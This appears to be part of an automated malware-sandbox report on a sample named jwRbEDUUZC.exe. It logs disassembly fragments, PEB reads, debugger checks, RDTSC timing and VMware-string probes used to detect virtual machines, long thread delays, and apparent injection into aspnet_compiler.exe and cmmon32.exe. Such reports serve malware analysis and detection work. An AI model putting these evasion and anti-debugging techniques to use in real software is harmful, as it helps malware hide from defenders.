Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0041BCD2 push esp; ret	1_2_0041BE41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_00418CD8 push edx; ret	1_2_00418CD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_00415588 push esi; retf	1_2_0041558A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_00415F51 push CA8369B7h; retf	1_2_00415F56
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0041B7C5 push eax; ret	1_2_0041B818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0129D0D1 push ecx; ret	1_2_0129D0E4
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A9D0D1 push ecx; ret	9_2_04A9D0E4
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B1B812 push eax; ret	9_2_00B1B818
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B1B81B push eax; ret	9_2_00B1B882
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B1B87C push eax; ret	9_2_00B1B882
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B0D155 push ecx; ret	9_2_00B0D156
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B16232 push 00000005h; retf	9_2_00B16234
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B18A7B push ss; ret	9_2_00B18A7F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B1BCD3 push esp; ret	9_2_00B1BE41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B18CD8 push edx; ret	9_2_00B18CD9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B15588 push esi; retf	9_2_00B1558A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B1B7C5 push eax; ret	9_2_00B1B818
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B15F51 push CA8369B7h; retf	9_2_00B15F56

Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 0000000000B08604 second address: 0000000000B0860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 0000000000B0898E second address: 0000000000B08994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\jwRbEDUUZC.exe TID: 6180	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 7092	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\cmmon32.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 1_2_004088C0 rdtsc

1_2_004088C0

Source: C:\Users\user\Desktop\jwRbEDUUZC.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	API coverage: 9.1 %
Source: C:\Windows\SysWOW64\cmmon32.exe	API coverage: 9.6 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\jwRbEDUUZC.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: explorer.exe, 00000002.00000000.389412821.000000000825E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.406506245.000000000084A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.388215219.0000000007FBD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.388215219.0000000007FBD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}d
Source: explorer.exe, 00000002.00000000.388425985.000000000807C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000000.388425985.000000000807C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000I
Source: explorer.exe, 00000002.00000000.388425985.000000000807C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000002.00000000.428667487.00000000042EE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q^
Source: explorer.exe, 00000002.00000000.491116547.00000000042A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000O

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\jwRbEDUUZC.exe

Code function: 0_2_00A132C0 CheckRemoteDebuggerPresent,

0_2_00A132C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 1_2_004088C0 rdtsc

1_2_004088C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01264120 mov eax, dword ptr fs:[00000030h]	1_2_01264120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01264120 mov eax, dword ptr fs:[00000030h]	1_2_01264120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01264120 mov eax, dword ptr fs:[00000030h]	1_2_01264120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01264120 mov eax, dword ptr fs:[00000030h]	1_2_01264120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01264120 mov ecx, dword ptr fs:[00000030h]	1_2_01264120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127513A mov eax, dword ptr fs:[00000030h]	1_2_0127513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127513A mov eax, dword ptr fs:[00000030h]	1_2_0127513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01249100 mov eax, dword ptr fs:[00000030h]	1_2_01249100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01249100 mov eax, dword ptr fs:[00000030h]	1_2_01249100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01249100 mov eax, dword ptr fs:[00000030h]	1_2_01249100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0124C962 mov eax, dword ptr fs:[00000030h]	1_2_0124C962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0124B171 mov eax, dword ptr fs:[00000030h]	1_2_0124B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0124B171 mov eax, dword ptr fs:[00000030h]	1_2_0124B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0126B944 mov eax, dword ptr fs:[00000030h]	1_2_0126B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0126B944 mov eax, dword ptr fs:[00000030h]	1_2_0126B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012761A0 mov eax, dword ptr fs:[00000030h]	1_2_012761A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012761A0 mov eax, dword ptr fs:[00000030h]	1_2_012761A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C69A6 mov eax, dword ptr fs:[00000030h]	1_2_012C69A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C51BE mov eax, dword ptr fs:[00000030h]	1_2_012C51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C51BE mov eax, dword ptr fs:[00000030h]	1_2_012C51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C51BE mov eax, dword ptr fs:[00000030h]	1_2_012C51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C51BE mov eax, dword ptr fs:[00000030h]	1_2_012C51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127A185 mov eax, dword ptr fs:[00000030h]	1_2_0127A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0126C182 mov eax, dword ptr fs:[00000030h]	1_2_0126C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01272990 mov eax, dword ptr fs:[00000030h]	1_2_01272990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0124B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0124B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0124B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0124B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0124B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0124B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012D41E8 mov eax, dword ptr fs:[00000030h]	1_2_012D41E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127002D mov eax, dword ptr fs:[00000030h]	1_2_0127002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127002D mov eax, dword ptr fs:[00000030h]	1_2_0127002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127002D mov eax, dword ptr fs:[00000030h]	1_2_0127002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127002D mov eax, dword ptr fs:[00000030h]	1_2_0127002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127002D mov eax, dword ptr fs:[00000030h]	1_2_0127002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0125B02A mov eax, dword ptr fs:[00000030h]	1_2_0125B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0125B02A mov eax, dword ptr fs:[00000030h]	1_2_0125B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0125B02A mov eax, dword ptr fs:[00000030h]	1_2_0125B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0125B02A mov eax, dword ptr fs:[00000030h]	1_2_0125B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01314015 mov eax, dword ptr fs:[00000030h]	1_2_01314015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01314015 mov eax, dword ptr fs:[00000030h]	1_2_01314015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C7016 mov eax, dword ptr fs:[00000030h]	1_2_012C7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C7016 mov eax, dword ptr fs:[00000030h]	1_2_012C7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C7016 mov eax, dword ptr fs:[00000030h]	1_2_012C7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01302073 mov eax, dword ptr fs:[00000030h]	1_2_01302073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01311074 mov eax, dword ptr fs:[00000030h]	1_2_01311074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01260050 mov eax, dword ptr fs:[00000030h]	1_2_01260050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01260050 mov eax, dword ptr fs:[00000030h]	1_2_01260050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012890AF mov eax, dword ptr fs:[00000030h]	1_2_012890AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012720A0 mov eax, dword ptr fs:[00000030h]	1_2_012720A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012720A0 mov eax, dword ptr fs:[00000030h]	1_2_012720A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012720A0 mov eax, dword ptr fs:[00000030h]	1_2_012720A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012720A0 mov eax, dword ptr fs:[00000030h]	1_2_012720A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012720A0 mov eax, dword ptr fs:[00000030h]	1_2_012720A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012720A0 mov eax, dword ptr fs:[00000030h]	1_2_012720A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127F0BF mov ecx, dword ptr fs:[00000030h]	1_2_0127F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127F0BF mov eax, dword ptr fs:[00000030h]	1_2_0127F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127F0BF mov eax, dword ptr fs:[00000030h]	1_2_0127F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01249080 mov eax, dword ptr fs:[00000030h]	1_2_01249080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C3884 mov eax, dword ptr fs:[00000030h]	1_2_012C3884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C3884 mov eax, dword ptr fs:[00000030h]	1_2_012C3884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012458EC mov eax, dword ptr fs:[00000030h]	1_2_012458EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012DB8D0 mov eax, dword ptr fs:[00000030h]	1_2_012DB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012DB8D0 mov ecx, dword ptr fs:[00000030h]	1_2_012DB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012DB8D0 mov eax, dword ptr fs:[00000030h]	1_2_012DB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012DB8D0 mov eax, dword ptr fs:[00000030h]	1_2_012DB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012DB8D0 mov eax, dword ptr fs:[00000030h]	1_2_012DB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012DB8D0 mov eax, dword ptr fs:[00000030h]	1_2_012DB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0130131B mov eax, dword ptr fs:[00000030h]	1_2_0130131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0124DB60 mov ecx, dword ptr fs:[00000030h]	1_2_0124DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01273B7A mov eax, dword ptr fs:[00000030h]	1_2_01273B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01273B7A mov eax, dword ptr fs:[00000030h]	1_2_01273B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0124DB40 mov eax, dword ptr fs:[00000030h]	1_2_0124DB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01318B58 mov eax, dword ptr fs:[00000030h]	1_2_01318B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0124F358 mov eax, dword ptr fs:[00000030h]	1_2_0124F358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01274BAD mov eax, dword ptr fs:[00000030h]	1_2_01274BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01274BAD mov eax, dword ptr fs:[00000030h]	1_2_01274BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01274BAD mov eax, dword ptr fs:[00000030h]	1_2_01274BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01315BA5 mov eax, dword ptr fs:[00000030h]	1_2_01315BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01251B8F mov eax, dword ptr fs:[00000030h]	1_2_01251B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01251B8F mov eax, dword ptr fs:[00000030h]	1_2_01251B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012FD380 mov ecx, dword ptr fs:[00000030h]	1_2_012FD380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01272397 mov eax, dword ptr fs:[00000030h]	1_2_01272397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127B390 mov eax, dword ptr fs:[00000030h]	1_2_0127B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0130138A mov eax, dword ptr fs:[00000030h]	1_2_0130138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012703E2 mov eax, dword ptr fs:[00000030h]	1_2_012703E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012703E2 mov eax, dword ptr fs:[00000030h]	1_2_012703E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012703E2 mov eax, dword ptr fs:[00000030h]	1_2_012703E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012703E2 mov eax, dword ptr fs:[00000030h]	1_2_012703E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012703E2 mov eax, dword ptr fs:[00000030h]	1_2_012703E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012703E2 mov eax, dword ptr fs:[00000030h]	1_2_012703E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0126DBE9 mov eax, dword ptr fs:[00000030h]	1_2_0126DBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C53CA mov eax, dword ptr fs:[00000030h]	1_2_012C53CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012C53CA mov eax, dword ptr fs:[00000030h]	1_2_012C53CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01284A2C mov eax, dword ptr fs:[00000030h]	1_2_01284A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01284A2C mov eax, dword ptr fs:[00000030h]	1_2_01284A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0130AA16 mov eax, dword ptr fs:[00000030h]	1_2_0130AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0130AA16 mov eax, dword ptr fs:[00000030h]	1_2_0130AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01258A0A mov eax, dword ptr fs:[00000030h]	1_2_01258A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0124AA16 mov eax, dword ptr fs:[00000030h]	1_2_0124AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0124AA16 mov eax, dword ptr fs:[00000030h]	1_2_0124AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01245210 mov eax, dword ptr fs:[00000030h]	1_2_01245210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01245210 mov ecx, dword ptr fs:[00000030h]	1_2_01245210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01245210 mov eax, dword ptr fs:[00000030h]	1_2_01245210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01245210 mov eax, dword ptr fs:[00000030h]	1_2_01245210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01263A1C mov eax, dword ptr fs:[00000030h]	1_2_01263A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012FB260 mov eax, dword ptr fs:[00000030h]	1_2_012FB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012FB260 mov eax, dword ptr fs:[00000030h]	1_2_012FB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0128927A mov eax, dword ptr fs:[00000030h]	1_2_0128927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01318A62 mov eax, dword ptr fs:[00000030h]	1_2_01318A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01249240 mov eax, dword ptr fs:[00000030h]	1_2_01249240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01249240 mov eax, dword ptr fs:[00000030h]	1_2_01249240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01249240 mov eax, dword ptr fs:[00000030h]	1_2_01249240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01249240 mov eax, dword ptr fs:[00000030h]	1_2_01249240
